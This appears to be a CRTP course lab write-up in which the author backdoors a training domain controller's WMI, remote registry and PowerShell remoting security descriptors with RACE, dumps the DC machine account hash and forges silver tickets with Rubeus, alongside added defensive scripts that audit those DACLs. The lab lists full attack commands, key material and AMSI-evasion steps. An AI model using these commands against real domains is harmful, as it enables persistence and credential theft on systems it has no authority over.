
# CRTP Lab 13

## Task 1

Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access.

Open elevated DA cmd:

{% code overflow="wrap" %}

```powershell
#ArgSplit asktgt

#Open DA cmd:
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```

{% endcode %}

After we get the shell as DA, run InviShell and import RACE:

```powershell
# InviShell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

# Import RACE
. C:\AD\Tools\RACE.ps1
```

Next, we grant the student user (student372) the same permissions as the Builtin Administrators (BA) group on the root\cimv2 WMI namespace:

{% code overflow="wrap" %}

```powershell
Set-RemoteWMI -SamAccountName student372 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose
```

{% endcode %}

With the security descriptors modified, we can execute WMI queries against dcorp-dc as student372 from a non-administrative prompt:

```powershell
gwmi -class win32_operatingsystem -ComputerName dcorp-dc

SystemDirectory : C:\Windows\system32
Organization    :
BuildNumber     : 20348
RegisteredUser  : Windows User
SerialNumber    : 00454-30000-00000-AA745
Version         : 10.0.20348
```
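The change above shows up directly in the namespace DACL, which is where a defender should look for it. The following audit script is an added example, not part of the lab or the RACE toolkit; it reads the security descriptor of a WMI namespace through `__SystemSecurity.GetSecurityDescriptor` and flags allow ACEs whose trustee is not one of the well-known SIDs present in a default root\cimv2 DACL. The allow-list and the host name `dcorp-dc` are assumptions for illustration; tune the list to your own baseline.

```powershell
# Added example (not lab or RACE code): audit a WMI namespace DACL and report
# trustees outside the default set. Default root\cimv2 grants Administrators
# full rights and Authenticated Users / LOCAL SERVICE / NETWORK SERVICE only
# local Enable + MethodExecute (+ ProviderWrite).

# WBEM access-mask bits as documented for WMI namespace security
$WbemRights = [ordered]@{
    Enable        = 0x00001
    MethodExecute = 0x00002
    FullWrite     = 0x00004
    PartialWrite  = 0x00008
    ProviderWrite = 0x00010
    RemoteEnable  = 0x00020
    ReadSecurity  = 0x20000
    EditSecurity  = 0x40000
}

function Get-WmiNamespaceAce {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        [string]$Namespace    = 'root\cimv2'
    )
    # __SystemSecurity.GetSecurityDescriptor returns a Win32_SecurityDescriptor
    $result = Invoke-WmiMethod -ComputerName $ComputerName -Namespace $Namespace `
        -Path '__SystemSecurity=@' -Name GetSecurityDescriptor
    if ($result.ReturnValue -ne 0) {
        throw "GetSecurityDescriptor failed on $ComputerName\$Namespace (code $($result.ReturnValue))"
    }
    foreach ($ace in $result.Descriptor.DACL) {
        # Decode the access mask into named rights
        $rights = $WbemRights.GetEnumerator() |
            Where-Object { ($ace.AccessMask -band $_.Value) -ne 0 } |
            ForEach-Object { $_.Key }
        [pscustomobject]@{
            ComputerName = $ComputerName
            Namespace    = $Namespace
            Trustee      = "$($ace.Trustee.Domain)\$($ace.Trustee.Name)"
            Sid          = $ace.Trustee.SIDString
            Type         = if ($ace.AceType -eq 0) { 'Allow' } else { 'Deny' }
            Inherited    = (($ace.AceFlags -band 0x10) -ne 0)   # INHERITED_ACE
            Rights       = ($rights -join ',')
        }
    }
}

function Find-UnexpectedWmiAce {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        [string]$Namespace    = 'root\cimv2',
        # Well-known SIDs found in a default root\cimv2 DACL (assumed baseline)
        [string[]]$ExpectedSids = @(
            'S-1-5-32-544',  # BUILTIN\Administrators
            'S-1-5-11',      # Authenticated Users
            'S-1-5-19',      # LOCAL SERVICE
            'S-1-5-20'       # NETWORK SERVICE
        )
    )
    Get-WmiNamespaceAce -ComputerName $ComputerName -Namespace $Namespace |
        Where-Object { $_.Type -eq 'Allow' -and $ExpectedSids -notcontains $_.Sid }
}

# Usage: full DACL, then only the ACEs a default install would not carry
Get-WmiNamespaceAce  -ComputerName dcorp-dc | Format-Table -AutoSize
Find-UnexpectedWmiAce -ComputerName dcorp-dc | Format-Table -AutoSize
```

A domain user appearing with `RemoteEnable` and `MethodExecute` on root\cimv2, as student372 does after Task 1, is the indicator to alert on; running the check from a scheduled job and diffing against a stored baseline catches the modification even when no WMI query is ever made afterwards.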

## Task 2

Retrieve machine account hash from dcorp-dc without using administrator access and use that to execute a Silver Ticket attack to get code execution with WMI.

Before we retrieve the machine account hash, we need to modify permissions on the DC.

{% code overflow="wrap" %}

```powershell
# Spawn a new Powershell.

powershell

. C:\AD\Tools\RACE.ps1

Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee student372 -Verbose

ComputerName                        BackdoorTrustee
------------                        ---------------
dcorp-dc.dollarcorp.moneycorp.local student372
```

{% endcode %}

Since student372 has been added as the backdoor trustee, we can retrieve the hash as student372.

```powershell
# Spawn new powershell
. C:\AD\Tools\RACE.ps1

Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose


ComputerName MachineAccountHash
------------ ------------------
dcorp-dc     0a05dd30b8f44589c534dcd951c765b6
```
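The registry backdoor works by adding an ACE for the trustee on sensitive HKLM hives, so the corresponding defensive check is to enumerate those hive ACLs over the remote registry and flag trustees that a default install does not have. This is an added example, not part of the lab or RACE. Which hives the backdoor touches is an assumption here; SAM, SECURITY and SYSTEM are the ones whose ACLs govern access to the material needed for hash extraction. The expected-SID list and `dcorp-dc` are likewise illustrative assumptions.

```powershell
# Added example (not lab or RACE code): list ACEs on the sensitive HKLM hives of a
# remote host and flag trustees that are not part of the default ACL.
# Requires the Remote Registry service on the target and READ_CONTROL on the keys
# (BUILTIN\Administrators have that even on SECURITY and SAM).

function Get-SensitiveHiveAce {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        # Assumed set of hives worth watching for backdoor ACEs
        [string[]]$SubKeys = @('SAM', 'SECURITY', 'SYSTEM'),
        # Trustees present on these hives by default (assumed baseline; tune to yours)
        [string[]]$ExpectedSids = @(
            'S-1-5-18',       # NT AUTHORITY\SYSTEM
            'S-1-5-32-544',   # BUILTIN\Administrators
            'S-1-5-32-545',   # BUILTIN\Users (read on SYSTEM)
            'S-1-3-0',        # CREATOR OWNER
            'S-1-15-2-1'      # ALL APPLICATION PACKAGES (read on SYSTEM)
        )
    )
    $base = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(
        [Microsoft.Win32.RegistryHive]::LocalMachine, $ComputerName)
    try {
        foreach ($name in $SubKeys) {
            # Open for permission reading only; no key data is requested
            $key = $base.OpenSubKey($name,
                [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadSubTree,
                [System.Security.AccessControl.RegistryRights]::ReadPermissions)
            if (-not $key) {
                Write-Warning "Could not open HKLM\$name on $ComputerName"
                continue
            }
            try {
                $acl = $key.GetAccessControl()
                $rules = $acl.GetAccessRules($true, $true,
                    [System.Security.Principal.SecurityIdentifier])
                foreach ($ace in $rules) {
                    $sid = $ace.IdentityReference.Value
                    # Resolve the SID to an account name where possible
                    try   { $account = $ace.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value }
                    catch { $account = $sid }
                    [pscustomobject]@{
                        ComputerName = $ComputerName
                        Key          = "HKLM\$name"
                        Trustee      = $account
                        Sid          = $sid
                        Type         = $ace.AccessControlType
                        Rights       = $ace.RegistryRights
                        Inherited    = $ace.IsInherited
                        Unexpected   = ($ace.AccessControlType -eq 'Allow' -and
                                        $ExpectedSids -notcontains $sid)
                    }
                }
            } finally { $key.Close() }
        }
    } finally { $base.Close() }
}

# Usage: show only the ACEs a default install would not have
Get-SensitiveHiveAce -ComputerName dcorp-dc |
    Where-Object Unexpected |
    Format-Table Key, Trustee, Type, Rights, Inherited -AutoSize
```

A non-inherited allow ACE for an ordinary domain account on any of these hives is the artifact the backdoor leaves behind; auditing the keys for SACL-based `Object Access` events additionally records who later reads them.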

Using the machine account hash, we perform a Silver Ticket attack for the HOST and RPCSS services on dcorp-dc (WMI needs tickets for both):

{% code overflow="wrap" %}

```powershell
# Host
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:0a05dd30b8f44589c534dcd951c765b6 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

# RPCSS
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /rc4:0a05dd30b8f44589c534dcd951c765b6 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
```

{% endcode %}

PS Remoting: we then attempt to grant student372 remoting access on dcorp-dc with Set-RemotePSRemoting. In this run the WinRM session was aborted with a transport error, shown below:

{% code overflow="wrap" %}

```
C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

C:\AD\Tools>set COR_ENABLE_PROFILING=1

C:\AD\Tools>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
The operation completed successfully.

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /f
The operation completed successfully.

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /ve /t REG_SZ /d "C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.

C:\AD\Tools>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\AD\Tools> . C:\AD\Tools\RACE.ps1
PS C:\AD\Tools> Set-RemotePSRemoting -SamAccountName student372 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose
[dcorp-dc.dollarcorp.moneycorp.local] Processing data from remote server dcorp-dc.dollarcorp.moneycorp.local failed
with the following error message: The I/O operation has been aborted because of either a thread exit or an application
request. For more information, see the about_Remote_Troubleshooting Help topic.
    + CategoryInfo          : OpenError: (dcorp-dc.dollarcorp.moneycorp.local:String) [], PSRemotingTransportException
    + FullyQualifiedErrorId : WinRMOperationAborted,PSSessionStateBroken
PS C:\AD\Tools>
```

{% endcode %}
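Whether or not the call above succeeds, the target of Set-RemotePSRemoting is the security descriptor of the PowerShell session configuration, which is the thing to audit. The following script is an added example, not lab or RACE code: it collects every session configuration's SDDL from a host over a legitimate administrative remoting session, parses it with `CommonSecurityDescriptor`, and flags allow ACEs whose SID is not among the default principals (Administrators, Remote Management Users, INTERACTIVE). The host name and the expected-SID list are assumptions.

```powershell
# Added example (not lab or RACE code): decode the DACL of each PowerShell session
# configuration on a host and flag principals outside the default set.
# Default Microsoft.PowerShell SDDL allows BA (Administrators), RM (Remote
# Management Users) and IU (INTERACTIVE); anything else needs an explanation.

function Get-PSSessionConfigAce {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        # Assumed default principals; extend with any deliberately delegated groups
        [string[]]$ExpectedSids = @(
            'S-1-5-32-544',   # BUILTIN\Administrators
            'S-1-5-32-580',   # BUILTIN\Remote Management Users
            'S-1-5-4'         # NT AUTHORITY\INTERACTIVE
        )
    )
    # Get-PSSessionConfiguration only runs locally, so query the host through an
    # existing administrative remoting session (it needs no descriptor changes).
    $configs = Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        Get-PSSessionConfiguration | Select-Object Name, SecurityDescriptorSddl
    }
    foreach ($cfg in $configs) {
        if (-not $cfg.SecurityDescriptorSddl) { continue }
        # Parse the SDDL string into a structured descriptor (not a container, not DS)
        $sd = New-Object System.Security.AccessControl.CommonSecurityDescriptor(
            $false, $false, $cfg.SecurityDescriptorSddl)
        foreach ($ace in $sd.DiscretionaryAcl) {
            $sid = $ace.SecurityIdentifier.Value
            try   { $account = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value }
            catch { $account = $sid }
            [pscustomobject]@{
                ComputerName  = $ComputerName
                Configuration = $cfg.Name
                Trustee       = $account
                Sid           = $sid
                Type          = $ace.AceType
                AccessMask    = ('0x{0:X}' -f $ace.AccessMask)
                Unexpected    = ($ace.AceType -eq 'AccessAllowed' -and
                                 $ExpectedSids -notcontains $sid)
            }
        }
    }
}

# Usage: review all entries, then only the unexpected ones
Get-PSSessionConfigAce -ComputerName dcorp-dc | Format-Table -AutoSize
Get-PSSessionConfigAce -ComputerName dcorp-dc |
    Where-Object Unexpected |
    Format-Table Configuration, Trustee, AccessMask -AutoSize
```

The same SDDL can also be captured from a known-good host once and compared as a string; any drift in the `Microsoft.PowerShell` or `Microsoft.PowerShell32` configurations on a domain controller is worth an alert, since those descriptors are rarely changed legitimately.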
